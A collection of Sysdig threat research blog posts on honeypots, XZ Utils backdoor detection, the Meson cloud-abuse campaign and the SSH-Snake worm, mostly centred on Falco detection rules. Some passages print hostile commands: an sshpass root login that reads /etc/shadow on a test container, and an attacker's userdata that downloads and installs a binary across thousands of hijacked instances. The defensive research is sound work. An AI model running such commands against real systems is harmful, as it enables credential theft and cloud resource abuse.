1 – Let’s take a quick look at the pods in the vcluster namespace. We can see our SSH server here called my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh. We’ll note that for future reference. 

10 – Here, we’ll set up a port forward to expose the SSH server. The $SSH_SERVICE environment variable holds the name of the SSH service (the my-dummy-ssh service we installed earlier).

18 – Now, we’ll kick off the rest of the events by using sshpass to SSH into the server and read the /etc/shadow file. Right now we’re doing this manually, so we don’t strictly need sshpass, but we’re going to be automating this later and we’ll need it then.

22 – Here, we can see the contents of the file.

$ kubectl get pods -n vcluster

NAME                                           READY   STATUS    RESTARTS   AGE
coredns-68bdd584b4-dwmms-x-kube-system-x-ssh   1/1     Running   0          4m43s
my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh      1/1     Running   0          3m42s
ssh-0                                          1/1     Running   0          5m7s

$ sleep 30

$ kubectl port-forward svc/"$SSH_SERVICE" 5555:22 -n vcluster & 

[1] 1196783
$ Forwarding from 127.0.0.1:5555 -> 22
Forwarding from [::1]:5555 -> 22

$ sleep 10

$ sshpass -p "THEPASSWORDYOUCREATED" ssh -o StrictHostKeyChecking=no -p 5555 root@127.0.0.1 "cat /etc/shadow"

Handling connection for 5555
root:$6$hJ/W8Ww6$pLqyBWSsxaZcksn12xZqA1Iqjz.15XryeIEZIEsa0lbiOR9/3G.qtXl/SvfFFCTPkElo7VUD7TihuOyVxEt5j/:18281:0:99999:7:::
daemon:*:18275:0:99999:7:::
bin:*:18275:0:99999:7:::
sys:*:18275:0:99999:7:::
sync:*:18275:0:99999:7:::
games:*:18275:0:99999:7:::
man:*:18275:0:99999:7:::
lp:*:18275:0:99999:7:::
mail:*:18275:0:99999:7:::
news:*:18275:0:99999:7:::
uucp:*:18275:0:99999:7:::
proxy:*:18275:0:99999:7:::
www-data:*:18275:0:99999:7:::
backup:*:18275:0:99999:7:::
list:*:18275:0:99999:7:::
irc:*:18275:0:99999:7:::
gnats:*:18275:0:99999:7:::
nobody:*:18275:0:99999:7:::
systemd-timesync:*:18275:0:99999:7:::
systemd-network:*:18275:0:99999:7:::
systemd-resolve:*:18275:0:99999:7:::
systemd-bus-proxy:*:18275:0:99999:7:::
_apt:*:18275:0:99999:7:::
sshd:*:18281:0:99999:7:::

Checking the Logs

Let’s see what all happened as a result of our attack against the SSH server.

1 – We’ll set an environment variable up to find the Falco pod for us and hold its location.

3 – Now, let’s have a look at those logs. The bits at the beginning are from Falco spinning up. Incidentally, we can see the override file that we created earlier loading here.

18 – This is the meaty bit. In the output, we can see “Warning Sensitive file opened for reading by non-trusted program (file=/etc/shadow),” which is exactly what we did when we poked at the SSH server.

22 – Now, let’s look at the Talon logs. Here, we’ll put a one-liner together that will find the Talon pods and fetch the logs for us. Note that there are two Talon pods and what we want could be in either of them, so we’ll grab the logs from both. You can see that the output is interleaved from both of them.

30 – Here, we can see the Falco event coming through to Talon. 

32 – And here we got a match against the Talon rule we created earlier. 

33 – Here is the action from the Talon rule being executed.

$ FALCO_POD=$(kubectl get pods -n falco -l app.kubernetes.io/name=falco -o=jsonpath='{.items[*].metadata.name}')

$ kubectl logs "$FALCO_POD" -n falco

Defaulted container "falco" out of: falco, falcoctl-artifact-follow, falco-driver-loader (init), falcoctl-artifact-install (init)
Fri Dec  0 05:33:49 2023: Falco version: 0.36.2 (x86_64)
Fri Dec  0 05:33:49 2023: Falco initialized with configuration file: /etc/falco/falco.yaml
Fri Dec  0 05:33:49 2023: Loading rules from file /etc/falco/falco_rules.yaml
Fri Dec  0 05:33:49 2023: Loading rules from file /etc/falco/rules.d/override.yaml
Fri Dec  0 05:33:49 2023: The chosen syscall buffer dimension is: 8388608 bytes (8 MBs)
Fri Dec  0 05:33:49 2023: Starting health webserver with threadiness 4, listening on port 8765
Fri Dec  0 05:33:49 2023: Loaded event sources: syscall
Fri Dec  0 05:33:49 2023: Enabled event sources: syscall
Fri Dec  0 05:33:49 2023: Opening 'syscall' source with Kernel module

<snip>

{"hostname":"falco-wchsq","output":"18:39:24.133546875: Warning Sensitive file opened for reading by non-trusted program (file=/etc/shadow gparent=sshd ggparent=containerd-shim gggparent=<NA> evt_type=open user=root user_uid=0 user_loginuid=0 process=cat proc_exepath=/bin/cat parent=sshd command=cat /etc/shadow terminal=0 exe_flags=O_RDONLY container_id=0f044393375b container_image=securecodebox/dummy-ssh container_image_tag=v1.0.0 container_name=k8s_dummy-ssh_my-dummy-ssh-7955bc99c8-mxshb-x-ssh-x-ssh_vcluster_e10eeedf-7ad2-4a7e-8b73-b7713d6537da_0 k8s_ns=vcluster k8s_pod_name=my-dummy-ssh-7955bc99c8-mxshb-x-ssh-x-ssh)","priority":"Warning","rule":"Read sensitive file untrusted","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2023-12-08T18:39:24.133546875Z", "output_fields": {"container.id":"0f044393375b","container.image.repository":"securecodebox/dummy-ssh","container.image.tag":"v1.0.0","container.name":"k8s_dummy-ssh_my-dummy-ssh-7955bc99c8-mxshb-x-ssh-x-ssh_vcluster_e10eeedf-7ad2-4a7e-8b73-b7713d6537da_0","evt.arg.flags":"O_RDONLY","evt.time":43012267506,"evt.type":"open","fd.name":"/etc/shadow","k8s.ns.name":"vcluster","k8s.pod.name":"my-dummy-ssh-7955bc99c8-mxshb-x-ssh-x-ssh","proc.aname[2]":"sshd","proc.aname[3]":"containerd-shim","proc.aname[4]":null,"proc.cmdline":"cat /etc/shadow","proc.exepath":"/bin/cat","proc.name":"cat","proc.pname":"sshd","proc.tty":0,"user.loginuid":0,"user.name":"root","user.uid":0}}

<snip>

$ kubectl get pods -n falco -l app.kubernetes.io/name=falco-talon -o=jsonpath='{range .items[*]}{.metadata.name}{"\n"}{end}' | xargs -I {} kubectl logs {} -n falco

2023-12-00T05:33:41Z INF init action_category=kubernetes
2023-12-00T05:33:41Z INF init notifier=k8sevents
2023-12-00T05:33:41Z INF init notifier=slack
2023-12-00T05:33:41Z INF init result="4 rules have been successfully loaded"
2023-12-00T05:33:41Z INF init result="watch of rules enabled"
2023-12-00T05:33:41Z INF init result="Falco Talon is up and listening on 0.0.0.0:2803"
2023-12-00T05:44:46Z INF event output="05:44:46.118305822: Warning Sensitive file opened for reading by non-trusted program (file=/etc/shadow gparent=sshd ggparent=containerd-shim gggparent=<NA> evt_type=open user=root user_uid=0 user_loginuid=0 process=cat proc_exepath=/bin/cat parent=sshd command=cat /etc/shadow terminal=0 exe_flags=O_RDONLY container_id=1536aa9c45c2 container_image=securecodebox/dummy-ssh container_image_tag=v1.0.0 container_name=k8s_dummy-ssh_my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh_vcluster_21bdc319-5566-41ee-8a64-d8b7628e5937_0 k8s_ns=vcluster k8s_pod_name=my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh)" priority=Warning rule="Read sensitive file untrusted" source=syscall 
trace_id=79db4b47-0112-4a22-8068-e171702e018a
2023-12-00T05:44:46Z INF match action=kubernetes:terminate rule="Sensitive file opened" trace_id=79db4b47-0112-4a22-8068-e171702e018a
2023-12-00T05:44:46Z INF action Namespace=vcluster Pod=my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh action=kubernetes:terminate event="05:44:46.118305822: Warning Sensitive file opened for reading by non-trusted program (file=/etc/shadow gparent=sshd ggparent=containerd-shim gggparent=<NA> evt_type=open user=root user_uid=0 user_loginuid=0 process=cat proc_exepath=/bin/cat parent=sshd command=cat /etc/shadow terminal=0 exe_flags=O_RDONLY container_id=1536aa9c45c2 container_image=securecodebox/dummy-ssh container_image_tag=v1.0.0 container_name=k8s_dummy-ssh_my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh_vcluster_21bdc319-5566-41ee-8a64-d8b7628e5937_0 k8s_ns=vcluster k8s_pod_name=my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh)" rule="Sensitive file opened" status=success trace_id=79db4b47-0112-4a22-8068-e171702e018a
2023-12-00T05:44:46Z INF notification action=kubernetes:terminate notifier=k8sevents rule="Sensitive file opened" status=success trace_id=79db4b47-0112-4a22-8068-e171702e018a
2023-12-00T05:33:41Z INF init action_category=kubernetes
2023-12-00T05:33:41Z INF init notifier=k8sevents
2023-12-00T05:33:41Z INF init notifier=slack
2023-12-00T05:33:41Z INF init result="4 rules have been successfully loaded"
2023-12-00T05:33:41Z INF init result="watch of rules enabled"
2023-12-00T05:33:41Z INF init result="Falco Talon is up and listening on 0.0.0.0:2803"

Now, let’s go take a peek at the cluster and see what happened as a result of our efforts. As we noted earlier, the name of the SSH server pod was my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh.

1 – Let’s get the pods again from the vcluster namespace. Now, we can see the name of the SSH server pod is my-dummy-ssh-7955bc99c8-k8jgl-x-ssh-x-ssh. Success!

8 – We’ll take a look at the events in the vcluster namespace and grep for my-dummy-ssh to find the bits we care about.

14 – Here, we can see the new SSH server pod my-dummy-ssh-7955bc99c8-k8jgl-x-ssh-x-ssh being started up.

20 – We can see the owned pod my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh being killed off. 

$ kubectl get pods -n vcluster

NAME                                           READY   STATUS    RESTARTS   AGE
coredns-68bdd584b4-dwmms-x-kube-system-x-ssh   1/1     Running   0          9m11s
my-dummy-ssh-7955bc99c8-k8jgl-x-ssh-x-ssh      1/1     Running   0          95s
ssh-0                                          1/1     Running   0          9m35s

$ kubectl get events -n vcluster | grep my-dummy-ssh

113s        Normal    falco-talon:kubernetes:terminate:success   pod/my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh      Status: success...
113s        Normal    Scheduled                                  pod/my-dummy-ssh-7955bc99c8-k8jgl-x-ssh-x-ssh      Successfully assigned vcluster/my-dummy-ssh-7955bc99c8-k8jgl-x-ssh-x-ssh to minikube
112s        Normal    Pulled                                     pod/my-dummy-ssh-7955bc99c8-k8jgl-x-ssh-x-ssh      Container image "docker.io/securecodebox/dummy-ssh:v1.0.0" already present on machine
112s        Normal    Created                                    pod/my-dummy-ssh-7955bc99c8-k8jgl-x-ssh-x-ssh      Created container dummy-ssh
112s        Normal    Started                                    pod/my-dummy-ssh-7955bc99c8-k8jgl-x-ssh-x-ssh      Started container dummy-ssh
8m28s       Normal    Scheduled                                  pod/my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh      Successfully assigned vcluster/my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh to minikube
8m27s       Normal    Pulling                                    pod/my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh      Pulling image "docker.io/securecodebox/dummy-ssh:v1.0.0"
8m18s       Normal    Pulled                                     pod/my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh      Successfully pulled image "docker.io/securecodebox/dummy-ssh:v1.0.0" in 9.611s (9.611s including waiting)
8m17s       Normal    Created                                    pod/my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh      Created container dummy-ssh
8m16s       Normal    Started                                    pod/my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh      Started container dummy-ssh
113s        Normal    Killing                                    pod/my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh      Stopping container dummy-ssh

And there we have it, end to end. Here’s what we did:

  • Attacked the SSH server pod
  • Tripped the ‘Read sensitive file untrusted’ rule in Falco
  • Shipped the event from Falcosidekick to Falco Talon over a webhook
  • Tripped the ‘Sensitive file opened’ rule in Falco Talon
  • Terminated the offending pod

And Now With Slightly More Automation

All of that above was quite a few moving parts. Wouldn’t it be nice if we could just run a script to do all of this? Yes, yes it would. Fortunately, we can do just that.

In the Sysdig TRT GitHub repo, pull down the minhoney.sh file. You’ll want to set it executable. To fire up the honeypot, simply run the script with the --buildit argument:

$ ./minhoney.sh --buildit

To take everything back down again, run the script again with the --burnit argument.

$ ./minhoney.sh --burnit
NOTE: When run with --burnit, the script will attempt to clean up anything that may cause problems with future runs. It will uninstall everything in helm, kill off everything in minikube, and delete everything in /tmp that the current user has permission to delete. It is NOT recommended that you run this on anything other than a system or instance built for this specific purpose. Don’t say we didn’t warn you, cause we totally warned you.

That’s All (for Now) Folks

Taking a step back, that’s the full flow, end to end: attack the SSH server pod, trip the ‘Read sensitive file untrusted’ rule in Falco, ship the event from Falcosidekick to Falco Talon over a webhook, match the ‘Sensitive file opened’ rule in Talon, and terminate the offending pod.

In the next part of this series, we’ll add several additional pieces to this. Logging and alerting would be nice, as well as additional automation to set everything up. We’ll also scale this up with some additional targets to attack.

For the previous episode with the basics, see Building honeypots with vcluster and Falco: Episode I.

The post Building Honeypots with vcluster and Falco: Episode II appeared first on Sysdig.

CVE-2024-3094: Detecting the SSHD backdoor in XZ Utils https://sysdig.com/blog/cve-2024-3094-detecting-the-sshd-backdoor-in-xz-utils/ Fri, 29 Mar 2024 22:08:04 +0000

On March 29th, 2024, a backdoor in a popular package called XZ Utils was announced on the Openwall mailing list. XZ Utils includes a library called liblzma, which is used by SSHD, a critical piece of Internet infrastructure for remote access. When the backdoored library (CVE-2024-3094) is loaded, it tampers with SSHD authentication, potentially allowing intruders access regardless of the authentication method used.

Affected versions: 5.6.0, 5.6.1

Affected Distributions: Fedora 41, Fedora Rawhide

*At the time of this writing

Background

A malicious threat actor committed code to the XZ Utils GitHub repository on February 23, 2024 that included obfuscated malicious code altering the build process. The altered build process then pulled the malicious file into the compilation of the liblzma library. At no point did the malicious code appear in cleartext, which made it difficult to detect. Linux distributions were a primary target of this attack, as they ship the compiled liblzma library that SSHD uses and distribute it to many users.

Once SSHD loads the now-malicious library, the authentication flow is redirected during RSA key checking. With control over the authentication flow, the library can grant access based on criteria set by the attacker, most likely the attacker’s own RSA keys or some other data only they know. Neither password nor PKI-based authentication is effective at this point.

Detection

This malicious library can be detected by Vulnerability Management solutions that look for the affected packages. CVE-2024-3094 can also be detected at runtime using Falco or the Sysdig Secure CNAPP platform. One runtime approach is to watch for SSHD loading the malicious library. These shared libraries often include the version in their filename, which makes the backdoored versions straightforward to spot on a test system.
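As a quick complement to the Falco approach, a shell sketch can flag a suspicious library path by filename alone (is_backdoored_liblzma is a hypothetical helper, and the path shown is only an example; real library paths vary by distribution):

```shell
# Hypothetical helper: flag filenames matching the backdoored
# liblzma versions (5.6.0 and 5.6.1)
is_backdoored_liblzma() {
  case "$1" in
    *liblzma.so.5.6.0|*liblzma.so.5.6.1) return 0 ;;  # affected versions
    *) return 1 ;;
  esac
}

# Example check against a library path SSHD might load
if is_backdoored_liblzma "/usr/lib/x86_64-linux-gnu/liblzma.so.5.6.1"; then
  echo "backdoored liblzma detected"
fi
```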

SSHD is a daemon executed at startup, which can make detection tricky if the detection agent doesn’t load in time. However, when a user logs in with SSH, a new SSHD process is spawned that also loads the affected libraries. This gives us two places to detect the loading of the shared library. Below is a Falco rule demonstrating exactly that.

For Sysdig Secure users, this rule is called “Backdoored library loaded into SSHD (CVE-2024-3094)” and can be found in the Sysdig Runtime Threat Detection policy.

- rule: Backdoored library loaded into SSHD (CVE-2024-3094)
  desc: A version of the liblzma library was seen loading which was backdoored by a malicious user in order to bypass SSHD authentication.
  condition: open_read and proc.name=sshd and (fd.name endswith "liblzma.so.5.6.0" or fd.name endswith "liblzma.so.5.6.1")
  output: SSHD Loaded a vulnerable library (file=%fd.name | proc.pname=%proc.pname gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4] image=%container.image.repository | proc.cmdline=%proc.cmdline | container.name=%container.name | proc.cwd=%proc.cwd proc.pcmdline=%proc.pcmdline user.name=%user.name user.loginuid=%user.loginuid user.uid=%user.uid user.loginname=%user.loginname | container.id=%container.id)
  priority: WARNING
  tags: [host, container]

Secure your cloud today with end-to-end detection

At the heart of Sysdig Secure lies Falco’s unified detection engine. This cutting‑edge engine leverages real‑time behavioral insights and threat intelligence to continuously monitor the multi‑layered infrastructure, identifying potential security breaches. Whether it’s anomalous container activities, unauthorized access attempts, supply chain vulnerabilities, or identity‑based threats, Sysdig ensures that organizations have a unified and proactive defense against evolving threats.

Dig deeper into how Sysdig provides continuous cloud security across AWS, GCP, and Azure.

Conclusion

Supply chain attacks are becoming increasingly common. As we saw in this attack against SSHD, the code made it past reviews and approvals. It was obfuscated in a way that didn’t raise any concerns. This is one of the drawbacks of relying on statically scanning source code. Runtime threat detection becomes a critical part of ensuring all of the components in your supply chain are operating as expected. It is very fortunate that the malicious library was caught before it made it into even more distributions.

The post CVE-2024-3094: Detecting the SSHD backdoor in XZ Utils appeared first on Sysdig.

Cloud Threats Deploying Crypto CDN | https://sysdig.com/blog/cloud-threats-deploying-crypto-cdn/ | Mon, 11 Mar 2024 14:22:26 +0000

The Sysdig Threat Research Team (TRT) discovered a malicious campaign using the blockchain-based Meson service to reap rewards ahead of the crypto token unlock happening around March 15th. Within minutes, the attacker attempted to create 6,000 Meson Network nodes using a compromised cloud account. The Meson Network is a decentralized content delivery network (CDN) that operates in Web3 by establishing a streamlined bandwidth marketplace through a blockchain protocol.

In this article, we cover what happened in the observed attack, further explain what the Meson Network is, and describe how the attacker was able to use it to their advantage.

What Happened

On February 26th, the Sysdig TRT responded to suspicious alerts for multiple AWS users associated with exposed services within our honeynet infrastructure. The attacker exploited CVE-2021-3129 in a Laravel application and a misconfiguration in WordPress to gain initial access to the cloud account. Following initial access, the attacker used automated reconnaissance techniques to quickly get the lay of the land. They then used the privileges identified for the compromised users to create a large number of EC2 instances.

The EC2 instances were created in the account using RunInstances with the following userdata. The userdata field allows for commands to be run when an EC2 instance starts. 

wget 'https://staticassets.meson.network/public/meson_cdn/v3.1.20/meson_cdn-linux-amd64.tar.gz' && tar -zxf meson_cdn-linux-amd64.tar.gz && rm -f meson_cdn-linux-amd64.tar.gz && cd ./meson_cdn-linux-amd64 && sudo ./service install meson_cdn
sudo ./meson_cdn config set --token=**** --https_port=443 --cache.size=30
sudo ./service start meson_cdn

The commands shown above download the meson_cdn binary and run it as a service. This code can be found in the official Meson network documentation.

Analysis of the CloudTrail logs showed the attacker came from a single IP address, 13[.]208[.]251[.]175. The compromised account experienced malicious activity across many AWS regions. The attacker used a public AMI (Ubuntu 22.04) and spawned multiple batches of 500 micro-sized instances per region, as reported in the following log. We had a limit set on the account restricting new EC2 creation to micro-sized instances; otherwise, the attacker would certainly have preferred larger, more expensive instances.

"eventTime": "2024-02-26T20:33:10Z",
    …
    "userAgent": "Boto3/1.34.49 md/Botocore#1.34.49 ua/2.0 os/linux#6.2.0-1017-aws md/arch#x86_64 lang/python#3.10.12 md/pyimpl#CPython cfg/retry-mode#legacy Botocore/1.34.49 Resource",
    "requestParameters": {
        "instancesSet": {
            "items": [
                {
                    "imageId": "ami-0a2e7efb4257c0907",
                    "minCount": 500,
                    "maxCount": 500
                }

Within minutes, the attacker was able to spawn almost 6,000 instances inside the compromised account across multiple regions and execute the meson_cdn binary. This comes at a huge cost for the account owner. As a result of the attack, we estimate a cost of more than $2,000 per day for all the Meson network nodes created, even just using micro sizes. This isn’t counting the potential costs for public IP addresses which could run as much as $22,000 a month for 6,000 nodes! Estimating the reward tokens amount and value the attacker could earn is difficult since those Meson tokens haven’t had values set yet in the public market.
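As a rough sanity check on the public IP figure above, here is a back-of-the-envelope sketch. The $0.005/hour IPv4 rate is an assumption for illustration, not quoted AWS pricing:

```shell
instances=6000
# ~$0.005 per public IPv4 address per hour, expressed in thousandths of a dollar
ip_rate_thousandths=5

# 6000 IPs * $0.005/hr * 24 hours * 30 days, in whole dollars
ip_month=$(( instances * ip_rate_thousandths * 24 * 30 / 1000 ))
echo "estimated public IPv4 cost: ~\$${ip_month}/month"
```

Even at micro instance sizes, the sheer node count is what drives the bill.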

Looking inside one of the instances created, we can see the meson_cdn process started correctly using the default configuration.

cat default.toml 

end_point = "https://cdn.meson.network"

https_port = 443

token = "ami-03f4878755434977f"

[cache]

  folder = "./m_cache"

  size = 30

[log]

  level = "INFO"

While monitoring the meson_cdn process’s system calls, it is possible to observe the files exchanged with the CDN. In our test system, the process created a cache file containing an image.

Checking the files created in the m_cache folder, we can find different content, like images and messages such as:

{"name":"GAS#30","description":"{GAS} - {GOLDAPESQUAD} - RARITIES INCLUDED, LAYERS ON LAYERS, COME TO DISCORD TO SHOW OFF YOUR APE!","image":"https://nftstorage.link/ipfs/bafybeicr3csbrrdo2h3g27ddu3sfppwzdfrufzpwm24qcmzbmy6jjuzydy/72","attributes":[{"trait_type":"APE PICS","value":"Download (82)"},{"trait_type":"BACKPICS","value":"Ai(4)"},{"trait_type":"Rarity Rank","value":363,"display_type":"number"}],"properties":{"files":[{"uri":"https://nftstorage.link/ipfs/bafybeicr3csbrrdo2h3g27ddu3sfppwzdfrufzpwm24qcmzbmy6jjuzydy/72"}]}}

Contrary to what we expected, the Meson application used a relatively low percentage of memory and CPU compared to traditional cryptojacking incidents. To better understand why, and why we are seeing image storage, let’s dig deeper into what Meson Network actually does.

What is Web3 and the Meson Network

Meson Network is a blockchain project committed to creating an efficient bandwidth marketplace on Web3, using a blockchain protocol model to replace the traditional cloud storage solutions like Google Drive or Amazon S3 which are more expensive and have privacy limitations.

For those who are not familiar with Web3, it is presented as an upgrade to its precursors, Web 1.0 and 2.0. This concept of a new decentralized internet is based on blockchain networks, cryptocurrencies, and NFTs, and claims to prioritize decentralization, redistributing ownership to users and creators for a fairer digital landscape.

To accomplish this goal, Web3 requires some basic conditions:

  • bandwidth to let the entire network be efficient 
  • storage to achieve decentralization

In this attack, we don’t talk about crypto mining in the traditional terms of memory or CPU cycle usage, but rather bandwidth and storage in return for Meson Network Tokens (MSN). The Meson documentation gives this explanation:

Mining Score = Bandwidth Score * Storage Score * Credit Score

This means miners will receive Meson tokens as a reward for providing servers to the Meson Network platform, and the reward will be calculated based on the amount of bandwidth and storage brought into the network. 
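To make that formula concrete, here is a toy calculation. The score values are purely hypothetical; real values come from the Meson platform:

```shell
# Hypothetical per-node scores for illustration only
bandwidth_score=8
storage_score=5
credit_score=2

# Mining Score = Bandwidth Score * Storage Score * Credit Score
mining_score=$(( bandwidth_score * storage_score * credit_score ))
echo "mining score: $mining_score"
```

Because the score multiplies bandwidth and storage, many small, well-connected nodes can out-earn a few powerful ones, which is exactly the shape of this attack.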

Going back to what we observed during the attack, this explains why the attack didn’t result in the usual massive amount of CPU being used but instead a huge number of connections.

New trend, new threats

The fact that Meson Network is getting some hype in the blockchain world isn’t a mystery after its Initial Coin Offering (ICO) on February 8th, 2024. As we saw, it is the perfect time for mining to inject liquidity and bring interest to a new coin.

The Sysdig TRT recently monitored a spike in images pushed to Docker Hub related to the Meson network and its features, reinforcing the interest in this service. One of the container images we analyzed, wawaitech/meson, was created around one month ago and runs gaganode, a Meson network product related to decentralized edge cloud computing.

The image looks legitimate and safe from a static point of view, which involves analyzing its layers and vulnerabilities. However, during runtime execution, we monitored outbound network traffic and spotted gaganode being executed and making connections to malicious IPs.

Same old cryptomining attack?

Yes and no. Attackers still want to use your resources for their goal and that hasn’t changed at all. What is different is the resources requested. For Meson, the attacker is more interested in storage space and high bandwidth instead of high performance CPUs. This can be achieved with a large number of small instances but with a good amount of storage.

Thanks to the ease of scalability in the cloud, spawning a large amount of resources is trivial and it can be done very quickly across multiple regions. Attackers can have their own CDNs ready in minutes and for free (to them)!

Detection

Knowing how this differs from the miners we are used to seeing, you may wonder if the usual detection is still effective.

While typical miners are detectable by looking for spikes in CPU usage, as we saw, that won’t be the case here. However, we can still monitor other resources, like instance storage space and network connections. A spike in traffic or storage usage is a red flag you should carefully look into.
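A simple sketch of that kind of check follows. The counts are stand-ins: on a real host, `conn_count` might come from something like `ss -Htn state established | wc -l`, and the baseline would be tuned to your environment:

```shell
conn_count=4200   # stand-in for the current established-connection count
baseline=500      # stand-in for the host's normal connection ceiling

# Flag hosts whose outbound connection count far exceeds their baseline
if [ "$conn_count" -gt "$baseline" ]; then
  echo "ALERT: $conn_count outbound connections exceed baseline of $baseline"
else
  echo "connection count within baseline"
fi
```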

For runtime detection, Falco can monitor outbound connections made by the host. The following Falco rule can help detect these malicious behaviors.

- rule: Unexpected outbound connection destination
  desc: Detect any outbound connection to a destination outside of an allowed set of ips, networks, or domain names
  condition: >
    consider_all_outbound_conns and outbound
  output: Disallowed outbound connection destination (proc.cmdline=%proc.cmdline connection=%fd.name user.name=%user.name user.loginuid=%user.loginuid proc.pid=%proc.pid proc.cwd=%proc.cwd proc.ppid=%proc.ppid proc.pcmdline=%proc.pcmdline proc.sid=%proc.sid)
  priority: NOTICE

Looking at cloud events instead, you could monitor instances created in the cloud. The following rule for Cloudtrail can help monitor RunInstances events.

- rule: Run Instances
  desc: Detect launching of a specified number of instances.
  condition: >
    ct.name="RunInstances" and not ct.error exists
  output: A number of instances have been launched on zones %ct.request.availabilityzone with subnet ID %ct.request.subnetid by user %ct.user on region %ct.region (requesting user=%ct.user, requesting IP=%ct.srcip, account ID=%ct.user.accountid, AWS region=%ct.region, arn=%ct.user.arn, availability zone=%ct.request.availabilityzone, subnet id=%ct.request.subnetid, reservation id=%ct.response.reservationid)
  priority: WARNING
  source: awscloudtrail

Another detection perspective might be monitoring unused AWS regions where commands aren’t normally executed. To use the following rule without noise, the list disallowed_aws_regions needs to be customized with the unused regions in your account.

- rule: AWS Command Executed on Unused Region
  desc: Detect AWS command execution on unused regions.
  condition: >
    not ct.error exists and ct.region in (disallowed_aws_regions)
  output: An AWS command of source %ct.src and name %ct.name has been executed by an untrusted user %ct.user on an unused region=%ct.region (requesting user=%ct.user, requesting IP=%ct.srcip, account ID=%ct.user.accountid, AWS region=%ct.region)
  priority: CRITICAL
  source: awscloudtrail

Conclusion

Attackers are continuing to diversify their income streams through new ways of leveraging compromised assets. It isn’t all about mining cryptocurrency anymore. Services like Meson network want to leverage hard drive space and network bandwidth instead of CPU.  While Meson may be a legitimate service, this shows that attackers are always on the lookout for new ways to make money. 

In order to prevent your resources from getting wrapped up in one of these attacks and having to shell out thousands of dollars for resource consumption, it is critical to keep your software up to date and monitor your environments for suspicious activity. 

The post Cloud Threats Deploying Crypto CDN appeared first on Sysdig.

SSH-Snake: New Self-Modifying Worm Threatens Networks | https://sysdig.com/blog/ssh-snake/ | Tue, 20 Feb 2024 19:00:00 +0000

The Sysdig Threat Research Team (TRT) discovered the malicious use of a new network mapping tool called SSH-Snake that was released on 4 January 2024. SSH-Snake is a self-modifying worm that leverages SSH credentials discovered on a compromised system to start spreading itself throughout the network. The worm automatically searches through known credential locations and shell history files to determine its next move. SSH-Snake is actively being used by threat actors in offensive operations. 

SSH-Snake activity can be identified by a runtime threat detection tool, such as Sysdig Secure or Open Source Falco.  At the end of this post are several Falco rules which can be used to detect this threat.

Traditional SSH Worms

One of the most commonly seen tactics after an attacker gains access to a system is the discovery of other targets and an attempt to reach them, known as lateral movement.

In previous research, we identified a worm that looked for SSH credentials hosted on the system that could be used to connect to another system, and the process repeated. This technique was used within the LABRAT dropper.

SSH-Snake

SSH-Snake takes this lateral movement concept to another level by being more thorough in its discovery of private keys. By avoiding the easily detectable patterns associated with scripted attacks, this new tool provides greater stealth, flexibility, configurability and more comprehensive credential discovery than typical SSH worms, therefore being more efficient and successful.

From the README:

“🐍 SSH-Snake is a powerful tool designed to perform automatic network traversal using SSH private keys discovered on systems, with the objective of creating a comprehensive map of a network and its dependencies, identifying to what extent a network can be compromised using SSH and SSH private keys starting from a particular system.”

SSH-Snake is a bash shell script which autonomously searches the system it is run on for SSH credentials. Once credentials are found, the script attempts to log into the target system and then copies itself there in order to repeat the process. The results of the worm’s activity are available to the attacker who can use them later in order to continue their operations.

Self-Modifying and Fileless

A unique aspect of SSH-Snake is that it modifies itself when it is first run in order to make itself smaller. All comments, whitespace, and unnecessary functions are removed. This is done out of necessity due to the way the shell script passes arguments and allows it to remain fileless. Compared to previous SSH worms, its initial form is much larger due to the expanded functionality and reliability.

The script is essentially plug-and-play, but easily customizable to your use case. You can disable and enable different parts of it, including the different strategies used to discover private keys and the destinations those private keys may be used to connect to. Unlike traditional scripts, SSH-Snake is designed to work on any device. It’s completely self-replicating and self-propagating — and completely fileless.
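As a toy illustration of that minification step (this is not SSH-Snake’s actual code, just the general idea of stripping comments and blank lines from a script before propagating it):

```shell
# A tiny sample "script" to minify
script='#!/bin/bash
# look for private keys
find ~/.ssh -name "id_*"

echo done'

# Drop comment-only lines and blank lines
# (a toy pattern: it also strips the shebang, which a real implementation would keep)
minified=$(printf '%s\n' "$script" | grep -vE '^[[:space:]]*#|^[[:space:]]*$')
printf '%s\n' "$minified"
```

Shrinking itself this way lets the worm pass its entire body as an argument or over a pipe to the next host, which is what makes the fileless propagation practical.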

Collection

SSH-Snake searches for multiple types of private keys located on the target system using a variety of methods. It also draws on other sources of information, including last and arp, to gather target data.

One of the most interesting features is find_from_bash_history, where commands of ssh, scp, and rsync are searched for and parsed. These entries contain a wealth of knowledge in relation to private key locations, credentials, and targets. For a full explanation of how SSH-Snake works, the author wrote an article where he explains it in depth.
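A rough sketch of that idea follows. The inline history is fabricated for illustration; SSH-Snake’s real parser is considerably more thorough:

```shell
# Fabricated shell history standing in for ~/.bash_history
history_sample='ssh -i ~/.ssh/id_rsa admin@10.0.0.7
ls -la
scp backup.tgz deploy@10.0.0.9:/tmp/
rsync -av /data/ backup@10.0.0.12:/srv/data/'

# Keep only the commands likely to reveal key paths, credentials, and targets
leads=$(printf '%s\n' "$history_sample" | grep -E '^(ssh|scp|rsync) ')
printf '%s\n' "$leads"
```

Each surviving line hands the worm a key path, a username, or a destination host it can try next.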

Operational Use

Sysdig TRT uncovered the command and control (C2) server of threat actors deploying SSH-Snake. This server holds a repository of files containing the output of SSH-Snake for each of the targets they have gained access to. 

